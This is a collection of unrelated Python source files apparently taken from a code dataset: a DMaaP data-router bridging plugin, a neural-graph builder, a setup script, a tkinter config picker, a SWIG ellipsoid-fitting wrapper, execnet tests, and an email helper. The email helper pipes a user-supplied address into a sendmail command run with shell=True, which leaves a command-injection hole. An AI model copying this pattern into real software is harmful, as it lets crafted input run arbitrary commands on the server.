raise Exception('No central location found for setting up DR bridging')
return locations[0] # We take the first one. Typically there will be two central locations
# Set up a "bridge" between two feeds internal to DCAE
# A source feed "bridges_to" a target feed, meaning that anything published to
# the source feed will be delivered to subscribers to the target feed (as well as
# to subscribers of the source feed).
#
# The bridge is established by first adding a publisher to the target feed. The result of doing this
# is a publish URL and a set of publication credentials.
#The publish URL and publication credentials are used to set up a subscriber to the source feed.
#I.e., we tell the source feed to deliver to an endpoint which is actually a publish
# endpoint for the target feed.
@operation
def create_dr_bridge(**kwargs):
try:
# Get source and target feed ids
if 'feed_id' in ctx.target.instance.runtime_properties:
target_feed_id = ctx.target.instance.runtime_properties['feed_id']
else:
raise Exception('Target feed has no feed_id property')
if 'feed_id' in ctx.source.instance.runtime_properties:
source_feed_id = ctx.source.instance.runtime_properties['feed_id']
else:
raise Exception('Source feed has no feed_id property')
dmc = DMaaPControllerHandle(DMAAP_API_URL, DMAAP_USER, DMAAP_PASS, ctx.logger)
# Get a location to use when creating a publisher or subscriber--a central location seems reasonable
loc = _get_central_location(dmc)
ctx.logger.info('Creating bridge from feed {0} to feed {1} using location {2}'.format(source_feed_id, target_feed_id, loc))
# Add publisher to target feed
publisher_id, username, userpw = _set_up_publisher(dmc, target_feed_id, loc)
ctx.logger.info("Added publisher id {0} to target feed {1} with user {2}".format(publisher_id, target_feed_id, username))
# Add subscriber to source feed
delivery_url = ctx.target.instance.runtime_properties['publish_url']
subscriber_info = _set_up_subscriber(dmc, source_feed_id, loc, delivery_url, username, userpw)
subscriber_id = subscriber_info["subId"]
ctx.logger.info("Added subscriber id {0} to source feed {1} with delivery url {2}".format(subscriber_id, source_feed_id, delivery_url))
# Save the publisher and subscriber IDs on the source node, indexed by the target node id
ctx.source.instance.runtime_properties[ctx.target.node.id] = {"publisher_id": publisher_id, "subscriber_id": subscriber_id}
except Exception as e:
ctx.logger.error("Error creating bridge: {0}".format(e))
raise NonRecoverableError(e)
# Set up a bridge from an internal DCAE feed to a feed in an external Data Router system
# The target feed needs to be provisioned in the external Data Router system. A publisher
# to that feed must also be set up in the external Data Router system. The publish URL,
# username, and password need to be captured in a target node of type dcae.nodes.ExternalTargetFeed.
# The bridge is established by setting up a subscriber to the internal DCAE source feed using the
# external feed publisher parameters as delivery parameters for the subscriber.
@operation
def create_external_dr_bridge(**kwargs):
try:
# Make sure target feed has full set of properties
if 'url' in ctx.target.node.properties and 'username' in ctx.target.node.properties and 'userpw' in ctx.target.node.properties:
url = ctx.target.node.properties['url']
username = ctx.target.node.properties['username']
userpw = ctx.target.node.properties['userpw']
else:
raise Exception ("Target feed missing url, username, and/or user pw")
# Make sure source feed has a feed ID
if 'feed_id' in ctx.source.instance.runtime_properties:
source_feed_id = ctx.source.instance.runtime_properties['feed_id']
else:
raise Exception('Source feed has no feed_id property')
dmc = DMaaPControllerHandle(DMAAP_API_URL, DMAAP_USER, DMAAP_PASS, ctx.logger)
# Get a central location to use when creating subscriber
loc = _get_central_location(dmc)
ctx.logger.info('Creating external bridge from feed {0} to external url {1} using location {2}'.format(source_feed_id, url, loc))
# Create subscription to source feed using properties of the external target feed
subscriber_info = _set_up_subscriber(dmc, source_feed_id, loc, url, username, userpw)
subscriber_id = subscriber_info["subId"]
ctx.logger.info("Added subscriber id {0} to source feed {1} with delivery url {2}".format(subscriber_id, source_feed_id, url))
# Save the subscriber ID on the source node, indexed by the target node id
ctx.source.instance.runtime_properties[ctx.target.node.id] = {"subscriber_id": subscriber_id}
except Exception as e:
ctx.logger.error("Error creating external bridge: {0}".format(e))
raise NonRecoverableError(e)
# Set up a bridge from a feed in an external Data Router system to an internal DCAE feed.
# The bridge is established by creating a publisher on the internal DCAE feed. Then a subscription
# to the external feed is created through manual provisioning in the external Data Router system, using
# the publish URL and the publisher username and password for the internal feed as the delivery parameters
# for the external subscription.
# In order to obtain the publish URL, publisher username, and password, a blueprint using this sort of
# bridge will typically have an output that exposes the runtime_property set on the source node in this operation.
@operation
def create_external_source_dr_bridge(**kwargs):
try:
# Get target feed id
if 'feed_id' in ctx.target.instance.runtime_properties:
target_feed_id = ctx.target.instance.runtime_properties['feed_id']
else:
raise Exception('Target feed has no feed_id property')
dmc = DMaaPControllerHandle(DMAAP_API_URL, DMAAP_USER, DMAAP_PASS, ctx.logger)
# Get a central location to use when creating a publisher
loc = _get_central_location(dmc)
# Create a publisher on the target feed
publisher_id, username, userpw = _set_up_publisher(dmc, target_feed_id, loc)
# Save the publisher info on the source node, indexed by the target node
ctx.source.instance.runtime_properties[ctx.target.node.id] = {"publisher_id": publisher_id, "url": ctx.target.instance.runtime_properties["publish_url"], "username": username, "userpw": userpw}
except Exception as e:
ctx.logger.error("Error creating external source bridge: {0}".format(e))
# Remove the bridge between the relationship source and target.
# For a bridge between 2 internal feeds, deletes the subscriber on the source feed and the publisher on the target feed.
# For a bridge to an external target feed, deletes the subscriber on the source feed.
# For a bridge from an external source feed, deletes the publisher on the target feed.
@operation
def remove_dr_bridge(**kwargs):
try:
dmc = DMaaPControllerHandle(DMAAP_API_URL, DMAAP_USER, DMAAP_PASS, ctx.logger)
if ctx.target.node.id in ctx.source.instance.runtime_properties:
if 'subscriber_id' in ctx.source.instance.runtime_properties[ctx.target.node.id]:
# Delete the subscription for this bridge
ctx.logger.info("Removing bridge -- deleting subscriber {0}".format(ctx.source.instance.runtime_properties[ctx.target.node.id]['subscriber_id']))
dmc.delete_subscriber(ctx.source.instance.runtime_properties[ctx.target.node.id]['subscriber_id'])
if 'publisher_id' in ctx.source.instance.runtime_properties:
# Delete the publisher for this bridge
ctx.logger.info("Removing bridge -- deleting publisher {0}".format(ctx.source.instance.runtime_properties[ctx.target.node.id]['publisher_id']))
dmc.delete_publisher(ctx.source.instance.runtime_properties[ctx.target.node.id]['publisher_id'])
ctx.logger.info("Remove bridge from {0} to {1}".format(ctx.source.node.id, ctx.target.node.id))
except Exception as e:
ctx.logger.error("Error removing bridge: {0}".format(e))
# Let the uninstall workflow proceed--don't throw a NonRecoverableError
|
StarcoderdataPython
|
8059584
|
<reponame>bionicles/neuromax
import tensorflow as tf
from tools import log, pipe
import nature
L = tf.keras.layers
def get_output(G, AI, id):
node = G.node[id]
log('get output for', node)
if node["shape"] is "cylinder":
return
if node["output"] is not None:
return node["output"]
node_type = node["node_type"]
brick = tf.identity
if node_type is "input":
spec = node['spec']
node['input'] = inputs = nature.Input(spec, batch_size=AI.batch)
brick = nature.Sensor(AI, spec)
else:
inputs = [get_output(G, AI, p) for p in list(G.predecessors(id))]
if len(inputs) > 1:
inputs = nature.Merge(AI)(inputs)
else:
inputs = inputs[0]
if node_type is "merge":
brick = pipe(nature.Regularizer(), L.BatchNormalization())
if 0 not in G.nodes() and id is "merge_1":
brick = tf.identity
if node_type is 'brick':
brick = nature.Brick(id, AI)(AI, units=AI.code_spec.shape[-1])
if node_type in ["output", 'critic']:
brick = nature.Actuator(AI, node['spec'])
output = brick(inputs)
node["output"] = output
node["brick"] = brick
return output
|
StarcoderdataPython
|
4816780
|
import os
HOME_DIR = os.path.expanduser("~")
ROOT_DIR = os.path.join(HOME_DIR, "DAZ 3D", "Bridges", "Daz To Maya")
EXPORT_DIR = os.path.join(ROOT_DIR, "Exports")
|
StarcoderdataPython
|
5164621
|
# -*- coding: utf-8 -*-
import sys
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
sys.path.insert(0, '.')
from python_lib import __version__, __doc__
setup(
name="python_lib",
version=__version__,
description=__doc__,
packages=["python_library"],
platforms=["any"],
classifiers=[
'Development Status :: 1 - Planning',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development :: Libraries :: Python Modules'
],
)
|
StarcoderdataPython
|
1768749
|
import subprocess
from datetime import datetime
from email.mime.text import MIMEText
from smtplib import SMTP_SSL
from uuid import uuid4
from pymongo.collection import Collection
def send_confirmation_email(col: Collection, email: str):
# Generate a code
confirmation_code = str(uuid4())
col.update_one({'email': email}, {'$set': {
'createdAt': datetime.now(), 'confirmationCode': confirmation_code
}})
# Send activation email with linux current user (If you don't have a MTA you can disable it)
message = f"https://golisten.ucd.ie/confirm-email?{confirmation_code}\r\n" \
f"Click the link to confirm your email address and it will be invalid in 30 minutes"
subject = "Please confirm your account"
sender = '<EMAIL>'
subprocess.run(f'echo "Content-Type: text/plain\r\nFrom: {sender}\r\nTo: {email}\r\n'
f'Subject: {subject}\r\n\r\n{message}" | sendmail -f {sender} {email}', shell=True)
def send_password_reset_email(confirmation: str, email: str):
# Send email with linux current user
message = f"https://golisten.ucd.ie/find-password?{confirmation}\r\n" \
f"You are resetting the password and the link will be invalid in 30 minutes"
subject = "Please check your reset password link"
sender = '<EMAIL>'
subprocess.run(f'echo "Content-Type: text/plain\r\nFrom: {sender}\r\nTo: {email}\r\n'
f'Subject: {subject}\r\n\r\n{message}" | sendmail -f {sender} {email}', shell=True)
def send_password_reset_email2(confirmation: str, target_email: str):
# Create an email content
msg = MIMEText(f"https://golisten.ucd.ie/find-password?{confirmation}\r\n"
f"You are resetting the password and the link will be invalid in 30 minutes\r\n")
msg['Subject'] = 'Please reset your password'
msg['From'] = '<EMAIL>'
msg['To'] = target_email
# Connect to localhost email server
conn = SMTP_SSL('localhost')
try:
# Login and send email
conn.sendmail('<EMAIL>', target_email, msg.as_string())
finally:
conn.quit()
# subprocess.run(f'echo "{message}" | mail -s "{subject}" {email}', shell=True)
|
StarcoderdataPython
|
8174254
|
# -*- coding: utf-8; -*-
import sys
import tkinter
from tkinter import ttk
import glob
import gui
import data
import os.path
import time
import urllib.parse
def show(conf_dir):
root = tkinter.Tk()
def createCombbox(parent, title, valList, onSelected):
frame = tkinter.LabelFrame(parent, bd=2, relief="ridge", text=title)
frame.pack(fill="both", expand=True)
val = tkinter.StringVar()
combo = ttk.Combobox(frame, textvariable=val, state='readonly')
combo.config(values=valList)
combo.set(valList[0])
if onSelected:
combo.bind("<<ComboboxSelected>>", onSelected)
combo.pack(fill="both", expand=True)
return val
pathList = []
for path in glob.glob("conf/*"):
basename = os.path.basename(path)
pathList.append(urllib.parse.unquote(basename))
new_config_txt = "<new config>"
pathList.append(new_config_txt)
confPathVar = createCombbox(root, "config", pathList, None)
def pushedButton(event):
conf_path = confPathVar.get()
root.destroy()
history_path = "history.json"
history = data.History.loadFile(history_path)
if conf_path == new_config_txt:
new_config = True
param = data.Parameter()
param.game_title = "%d" % (time.time())
else:
new_config = False
conf_path = os.path.join(conf_dir, urllib.parse.quote(conf_path))
param = data.Parameter.loadFile(conf_path)
gui.show(param, history)
history.save(history_path)
if new_config:
title = urllib.parse.quote(param.game_title)
conf_path = os.path.join(conf_dir, "%s.json" % (title))
param.save(conf_path)
okButton = tkinter.Button(root, text=u'OK', width=50)
okButton.bind("<1>", pushedButton)
okButton.pack(fill="both", expand=True)
root.mainloop()
if __name__ == '__main__':
show("conf")
|
StarcoderdataPython
|
98768
|
from .Pane import Pane # Since the other classes use Pane is must be first
from .CluePane import CluePane
from .MediaPane import MediaPane
from .ChatPane import ChatPane
from .AppPane import AppPane
__all__ = ['CluePane', 'MediaPane', 'Pane', 'ChatPane', 'AppPane']
|
StarcoderdataPython
|
3580668
|
<filename>UDEMY-Learn Python Programming Masterclass/Section 4-Program Flow Control in Python/exercise5.py
# Extracting capitals
# Write a program to print out the capital letters in the string
#
# "Alright, but apart from the Sanitation, the Medicine, Education, Wine, Public Order, Irrigation, Roads, the Fresh-Water System, and Public Health, what have the Romans ever done for us?"
#
# Check out the string methods for one way to test if a character is in uppercase.
quote = """
Alright, but apart from the Sanitation, the Medicine, Education, Wine,
Public Order, Irrigation, Roads, the Fresh-Water System,
and Public Health, what have the Romans ever done for us?
"""
# Use a for loop and an if statement to print just the capitals in the quote above.
for char in quote:
if char.isupper():
print(char)
|
StarcoderdataPython
|
5053505
|
<filename>bin/ADFRsuite/CCSBpckgs/geomutils/efitlib.py
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.5
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_efitlib', [dirname(__file__)])
except ImportError:
import _efitlib
return _efitlib
if fp is not None:
try:
_mod = imp.load_module('_efitlib', fp, pathname, description)
finally:
fp.close()
return _mod
_efitlib = swig_import_helper()
del swig_import_helper
else:
import _efitlib
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
class ellipsoid(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, ellipsoid, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, ellipsoid, name)
__repr__ = _swig_repr
__swig_setmethods__["name"] = _efitlib.ellipsoid_name_set
__swig_getmethods__["name"] = _efitlib.ellipsoid_name_get
if _newclass:
name = _swig_property(_efitlib.ellipsoid_name_get, _efitlib.ellipsoid_name_set)
__swig_setmethods__["position"] = _efitlib.ellipsoid_position_set
__swig_getmethods__["position"] = _efitlib.ellipsoid_position_get
if _newclass:
position = _swig_property(_efitlib.ellipsoid_position_get, _efitlib.ellipsoid_position_set)
__swig_setmethods__["axis"] = _efitlib.ellipsoid_axis_set
__swig_getmethods__["axis"] = _efitlib.ellipsoid_axis_get
if _newclass:
axis = _swig_property(_efitlib.ellipsoid_axis_get, _efitlib.ellipsoid_axis_set)
__swig_setmethods__["orientation"] = _efitlib.ellipsoid_orientation_set
__swig_getmethods__["orientation"] = _efitlib.ellipsoid_orientation_get
if _newclass:
orientation = _swig_property(_efitlib.ellipsoid_orientation_get, _efitlib.ellipsoid_orientation_set)
__swig_setmethods__["inv_orientation"] = _efitlib.ellipsoid_inv_orientation_set
__swig_getmethods__["inv_orientation"] = _efitlib.ellipsoid_inv_orientation_get
if _newclass:
inv_orientation = _swig_property(_efitlib.ellipsoid_inv_orientation_get, _efitlib.ellipsoid_inv_orientation_set)
__swig_setmethods__["tensor"] = _efitlib.ellipsoid_tensor_set
__swig_getmethods__["tensor"] = _efitlib.ellipsoid_tensor_get
if _newclass:
tensor = _swig_property(_efitlib.ellipsoid_tensor_get, _efitlib.ellipsoid_tensor_set)
def getPosition(self):
return _efitlib.ellipsoid_getPosition(self)
def getAxis(self):
return _efitlib.ellipsoid_getAxis(self)
def getOrientation(self):
return _efitlib.ellipsoid_getOrientation(self)
def __init__(self):
this = _efitlib.new_ellipsoid()
try:
self.this.append(this)
except:
self.this = this
__swig_destroy__ = _efitlib.delete_ellipsoid
__del__ = lambda self: None
ellipsoid_swigregister = _efitlib.ellipsoid_swigregister
ellipsoid_swigregister(ellipsoid)
class efit_info(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, efit_info, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, efit_info, name)
__repr__ = _swig_repr
__swig_setmethods__["weightflag"] = _efitlib.efit_info_weightflag_set
__swig_getmethods__["weightflag"] = _efitlib.efit_info_weightflag_get
if _newclass:
weightflag = _swig_property(_efitlib.efit_info_weightflag_get, _efitlib.efit_info_weightflag_set)
__swig_setmethods__["covarflag"] = _efitlib.efit_info_covarflag_set
__swig_getmethods__["covarflag"] = _efitlib.efit_info_covarflag_get
if _newclass:
covarflag = _swig_property(_efitlib.efit_info_covarflag_get, _efitlib.efit_info_covarflag_set)
__swig_setmethods__["volumeflag"] = _efitlib.efit_info_volumeflag_set
__swig_getmethods__["volumeflag"] = _efitlib.efit_info_volumeflag_get
if _newclass:
volumeflag = _swig_property(_efitlib.efit_info_volumeflag_get, _efitlib.efit_info_volumeflag_set)
__swig_setmethods__["matrixflag"] = _efitlib.efit_info_matrixflag_set
__swig_getmethods__["matrixflag"] = _efitlib.efit_info_matrixflag_get
if _newclass:
matrixflag = _swig_property(_efitlib.efit_info_matrixflag_get, _efitlib.efit_info_matrixflag_set)
__swig_setmethods__["nocenterflag"] = _efitlib.efit_info_nocenterflag_set
__swig_getmethods__["nocenterflag"] = _efitlib.efit_info_nocenterflag_get
if _newclass:
nocenterflag = _swig_property(_efitlib.efit_info_nocenterflag_get, _efitlib.efit_info_nocenterflag_set)
__swig_setmethods__["noscaleflag"] = _efitlib.efit_info_noscaleflag_set
__swig_getmethods__["noscaleflag"] = _efitlib.efit_info_noscaleflag_get
if _newclass:
noscaleflag = _swig_property(_efitlib.efit_info_noscaleflag_get, _efitlib.efit_info_noscaleflag_set)
__swig_setmethods__["nosortflag"] = _efitlib.efit_info_nosortflag_set
__swig_getmethods__["nosortflag"] = _efitlib.efit_info_nosortflag_get
if _newclass:
nosortflag = _swig_property(_efitlib.efit_info_nosortflag_get, _efitlib.efit_info_nosortflag_set)
__swig_setmethods__["count"] = _efitlib.efit_info_count_set
__swig_getmethods__["count"] = _efitlib.efit_info_count_get
if _newclass:
count = _swig_property(_efitlib.efit_info_count_get, _efitlib.efit_info_count_set)
__swig_setmethods__["cov_scale"] = _efitlib.efit_info_cov_scale_set
__swig_getmethods__["cov_scale"] = _efitlib.efit_info_cov_scale_get
if _newclass:
cov_scale = _swig_property(_efitlib.efit_info_cov_scale_get, _efitlib.efit_info_cov_scale_set)
__swig_setmethods__["ell_scale"] = _efitlib.efit_info_ell_scale_set
__swig_getmethods__["ell_scale"] = _efitlib.efit_info_ell_scale_get
if _newclass:
ell_scale = _swig_property(_efitlib.efit_info_ell_scale_get, _efitlib.efit_info_ell_scale_set)
def __init__(self):
this = _efitlib.new_efit_info()
try:
self.this.append(this)
except:
self.this = this
__swig_destroy__ = _efitlib.delete_efit_info
__del__ = lambda self: None
efit_info_swigregister = _efitlib.efit_info_swigregister
efit_info_swigregister(efit_info)
def fitEllipse(pts, ell_scale, cov_scale, eptr, ellipsoid):
return _efitlib.fitEllipse(pts, ell_scale, cov_scale, eptr, ellipsoid)
fitEllipse = _efitlib.fitEllipse
def vec_normalize(vector_in_out):
return _efitlib.vec_normalize(vector_in_out)
vec_normalize = _efitlib.vec_normalize
def vec_centroid(count, src, p):
return _efitlib.vec_centroid(count, src, p)
vec_centroid = _efitlib.vec_centroid
def vec_dot(arg1, arg2):
return _efitlib.vec_dot(arg1, arg2)
vec_dot = _efitlib.vec_dot
def vec_magsq(VECTOR):
return _efitlib.vec_magsq(VECTOR)
vec_magsq = _efitlib.vec_magsq
def vec_mag(VECTOR):
return _efitlib.vec_mag(VECTOR)
vec_mag = _efitlib.vec_mag
def vec_distancesq(arg1, arg2):
return _efitlib.vec_distancesq(arg1, arg2)
vec_distancesq = _efitlib.vec_distancesq
def vec_distance(arg1, arg2):
return _efitlib.vec_distance(arg1, arg2)
vec_distance = _efitlib.vec_distance
def vec_max(VECTOR):
return _efitlib.vec_max(VECTOR)
vec_max = _efitlib.vec_max
def vec_length(VECTOR):
return _efitlib.vec_length(VECTOR)
vec_length = _efitlib.vec_length
def vec_ctos(VECTOR):
return _efitlib.vec_ctos(VECTOR)
vec_ctos = _efitlib.vec_ctos
def vec_stoc(VECTOR):
return _efitlib.vec_stoc(VECTOR)
vec_stoc = _efitlib.vec_stoc
def vec_sub(arg1, arg2):
return _efitlib.vec_sub(arg1, arg2)
vec_sub = _efitlib.vec_sub
def vec_copy(VECTOR):
return _efitlib.vec_copy(VECTOR)
vec_copy = _efitlib.vec_copy
def vec_add(arg1, arg2):
return _efitlib.vec_add(arg1, arg2)
vec_add = _efitlib.vec_add
def vec_scale(f, VECTOR):
return _efitlib.vec_scale(f, VECTOR)
vec_scale = _efitlib.vec_scale
def vec_zero():
return _efitlib.vec_zero()
vec_zero = _efitlib.vec_zero
def vec_cross(arg1, arg2):
return _efitlib.vec_cross(arg1, arg2)
vec_cross = _efitlib.vec_cross
def vec_mult(arg1, arg2):
return _efitlib.vec_mult(arg1, arg2)
vec_mult = _efitlib.vec_mult
def vec_offset(s, arg2, arg3):
return _efitlib.vec_offset(s, arg2, arg3)
vec_offset = _efitlib.vec_offset
def vec_rand():
return _efitlib.vec_rand()
vec_rand = _efitlib.vec_rand
def vec_average(arg1, arg2, arg3):
return _efitlib.vec_average(arg1, arg2, arg3)
vec_average = _efitlib.vec_average
def vec_transform(VECTOR, ARRAY2D):
return _efitlib.vec_transform(VECTOR, ARRAY2D)
vec_transform = _efitlib.vec_transform
def vec_ftransform(VECTOR, ARRAY2D):
return _efitlib.vec_ftransform(VECTOR, ARRAY2D)
vec_ftransform = _efitlib.vec_ftransform
def mat_jacobi(ARRAY2D):
return _efitlib.mat_jacobi(ARRAY2D)
mat_jacobi = _efitlib.mat_jacobi
def quat_to_mat(VECTOR):
return _efitlib.quat_to_mat(VECTOR)
quat_to_mat = _efitlib.quat_to_mat
def mat_to_quat(ARRAY2D, VECTOR):
return _efitlib.mat_to_quat(ARRAY2D, VECTOR)
mat_to_quat = _efitlib.mat_to_quat
# This file is compatible with both classic and new-style classes.
|
StarcoderdataPython
|
11336028
|
"""Module for converting between NetworkX and RDFLib graphs"""
from .rdf import RDFConverter
from .nx import NXConverter
|
StarcoderdataPython
|
4888994
|
from __future__ import with_statement
import py
import pytest
import sys
import os
import subprocess
import inspect
import execnet
from execnet import gateway_base, gateway, gateway_io
from execnet.gateway_base import Message, ChannelFactory, Popen2IO
try:
from StringIO import StringIO as BytesIO
except:
from io import BytesIO
skip_win_pypy = pytest.mark.xfail(condition=hasattr(sys, 'pypy_version_info') and sys.platform.startswith('win'),
reason='failing on Windows on PyPy (#63)')
class TestSerializeAPI:
pytestmark = [
pytest.mark.parametrize("val", [
"123", 42, [1, 2, 3], ["23", 25]])]
def test_serializer_api(self, val):
dumped = execnet.dumps(val)
val2 = execnet.loads(dumped)
assert val == val2
def test_mmap(self, tmpdir, val):
mmap = pytest.importorskip("mmap").mmap
p = tmpdir.join("data")
with p.open("wb") as f:
f.write(execnet.dumps(val))
f = p.open("r+b")
m = mmap(f.fileno(), 0)
val2 = execnet.load(m)
assert val == val2
def test_bytesio(self, val):
f = py.io.BytesIO()
execnet.dump(f, val)
read = py.io.BytesIO(f.getvalue())
val2 = execnet.load(read)
assert val == val2
def test_serializer_api_version_error(monkeypatch):
bchr = gateway_base.bchr
monkeypatch.setattr(gateway_base, 'DUMPFORMAT_VERSION', bchr(1))
dumped = execnet.dumps(42)
monkeypatch.setattr(gateway_base, 'DUMPFORMAT_VERSION', bchr(2))
pytest.raises(execnet.DataFormatError, lambda: execnet.loads(dumped))
def test_errors_on_execnet():
assert hasattr(execnet, 'RemoteError')
assert hasattr(execnet, 'TimeoutError')
assert hasattr(execnet, 'DataFormatError')
def test_subprocess_interaction(anypython):
line = gateway_io.popen_bootstrapline
compile(line, 'xyz', 'exec')
args = [str(anypython), '-c', line]
popen = subprocess.Popen(
args, bufsize=0, universal_newlines=True,
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
def send(line):
popen.stdin.write(line)
if sys.version_info > (3, 0) or sys.platform.startswith("java"):
popen.stdin.flush()
def receive():
return popen.stdout.readline()
try:
source = py.code.Source(read_write_loop, "read_write_loop()")
repr_source = repr(str(source)) + "\n"
sendline = repr_source
send(sendline)
s = receive()
assert s == "ok\n"
send("hello\n")
s = receive()
assert s == "received: hello\n"
send("world\n")
s = receive()
assert s == "received: world\n"
send('\n') # terminate loop
finally:
popen.stdin.close()
popen.stdout.close()
popen.wait()
def read_write_loop():
sys.stdout.write("ok\n")
sys.stdout.flush()
while 1:
try:
line = sys.stdin.readline()
if not line.strip():
break
sys.stdout.write("received: %s" % line)
sys.stdout.flush()
except (IOError, EOFError):
break
def test_io_message(anypython, tmpdir, execmodel):
check = tmpdir.join("check.py")
check.write(py.code.Source(gateway_base, """
try:
from io import BytesIO
except ImportError:
from StringIO import StringIO as BytesIO
import tempfile
temp_out = BytesIO()
temp_in = BytesIO()
io = Popen2IO(temp_out, temp_in, get_execmodel({backend!r}))
for i, handler in enumerate(Message._types):
print ("checking %s %s" %(i, handler))
for data in "hello", "hello".encode('ascii'):
msg1 = Message(i, i, dumps(data))
msg1.to_io(io)
x = io.outfile.getvalue()
io.outfile.truncate(0)
io.outfile.seek(0)
io.infile.seek(0)
io.infile.write(x)
io.infile.seek(0)
msg2 = Message.from_io(io)
assert msg1.channelid == msg2.channelid, (msg1, msg2)
assert msg1.data == msg2.data, (msg1.data, msg2.data)
assert msg1.msgcode == msg2.msgcode
print ("all passed")
""".format(backend=execmodel.backend)))
# out = py.process.cmdexec("%s %s" %(executable,check))
out = anypython.sysexec(check)
print (out)
assert "all passed" in out
def test_popen_io(anypython, tmpdir, execmodel):
check = tmpdir.join("check.py")
check.write(py.code.Source(gateway_base, """
do_exec("io = init_popen_io(get_execmodel({backend!r}))", globals())
io.write("hello".encode('ascii'))
s = io.read(1)
assert s == "x".encode('ascii')
""".format(backend=execmodel.backend)))
from subprocess import Popen, PIPE
args = [str(anypython), str(check)]
proc = Popen(args, stdin=PIPE, stdout=PIPE, stderr=PIPE)
proc.stdin.write("x".encode('ascii'))
stdout, stderr = proc.communicate()
print (stderr)
proc.wait()
assert "hello".encode('ascii') in stdout
def test_popen_io_readloop(monkeypatch, execmodel):
sio = BytesIO('test'.encode('ascii'))
io = Popen2IO(sio, sio, execmodel)
real_read = io._read
def newread(numbytes):
if numbytes > 1:
numbytes = numbytes-1
return real_read(numbytes)
io._read = newread
result = io.read(3)
assert result == 'tes'.encode('ascii')
def test_rinfo_source(anypython, tmpdir):
check = tmpdir.join("check.py")
check.write(py.code.Source("""
class Channel:
def send(self, data):
assert eval(repr(data), {}) == data
channel = Channel()
""", gateway.rinfo_source, """
print ('all passed')
"""))
out = anypython.sysexec(check)
print (out)
assert "all passed" in out
def test_geterrortext(anypython, tmpdir):
check = tmpdir.join("check.py")
check.write(py.code.Source(gateway_base, """
class Arg:
pass
errortext = geterrortext((Arg, "1", 4))
assert "Arg" in errortext
import sys
try:
raise ValueError("17")
except ValueError:
excinfo = sys.exc_info()
s = geterrortext(excinfo)
assert "17" in s
print ("all passed")
"""))
out = anypython.sysexec(check)
print (out)
assert "all passed" in out
@pytest.mark.skipif("not hasattr(os, 'dup')")
def test_stdouterrin_setnull(execmodel):
cap = py.io.StdCaptureFD()
gateway_base.init_popen_io(execmodel)
os.write(1, "hello".encode('ascii'))
if os.name == "nt":
os.write(2, "world")
os.read(0, 1)
out, err = cap.reset()
assert not out
assert not err
class PseudoChannel:
class gateway:
class _channelfactory:
finished = False
def __init__(self):
self._sent = []
self._closed = []
self.id = 1000
def send(self, obj):
self._sent.append(obj)
def close(self, errortext=None):
self._closed.append(errortext)
def test_exectask(execmodel):
io = py.io.BytesIO()
io.execmodel = execmodel
gw = gateway_base.SlaveGateway(io, id="something")
ch = PseudoChannel()
gw.executetask((ch, ("raise ValueError()", None, {})))
assert "ValueError" in str(ch._closed[0])
class TestMessage:
def test_wire_protocol(self):
for i, handler in enumerate(Message._types):
one = py.io.BytesIO()
data = '23'.encode('ascii')
Message(i, 42, data).to_io(one)
two = py.io.BytesIO(one.getvalue())
msg = Message.from_io(two)
assert msg.msgcode == i
assert isinstance(msg, Message)
assert msg.channelid == 42
assert msg.data == data
assert isinstance(repr(msg), str)
class TestPureChannel:
@pytest.fixture
def fac(self, execmodel):
class Gateway:
pass
Gateway.execmodel = execmodel
return ChannelFactory(Gateway)
def test_factory_create(self, fac):
chan1 = fac.new()
assert chan1.id == 1
chan2 = fac.new()
assert chan2.id == 3
def test_factory_getitem(self, fac):
chan1 = fac.new()
assert fac._channels[chan1.id] == chan1
chan2 = fac.new()
assert fac._channels[chan2.id] == chan2
def test_channel_timeouterror(self, fac):
channel = fac.new()
pytest.raises(IOError, channel.waitclose, timeout=0.01)
def test_channel_makefile_incompatmode(self, fac):
channel = fac.new()
with pytest.raises(ValueError):
channel.makefile("rw")
class TestSourceOfFunction(object):
def test_lambda_unsupported(self):
pytest.raises(ValueError, gateway._source_of_function, lambda: 1)
def test_wrong_prototype_fails(self):
def prototype(wrong):
pass
pytest.raises(ValueError, gateway._source_of_function, prototype)
def test_function_without_known_source_fails(self):
# this one wont be able to find the source
mess = {}
py.builtin.exec_('def fail(channel): pass', mess, mess)
print(inspect.getsourcefile(mess['fail']))
pytest.raises(ValueError, gateway._source_of_function, mess['fail'])
def test_function_with_closure_fails(self):
mess = {}
def closure(channel):
print(mess)
pytest.raises(ValueError, gateway._source_of_function, closure)
def test_source_of_nested_function(self):
def working(channel):
pass
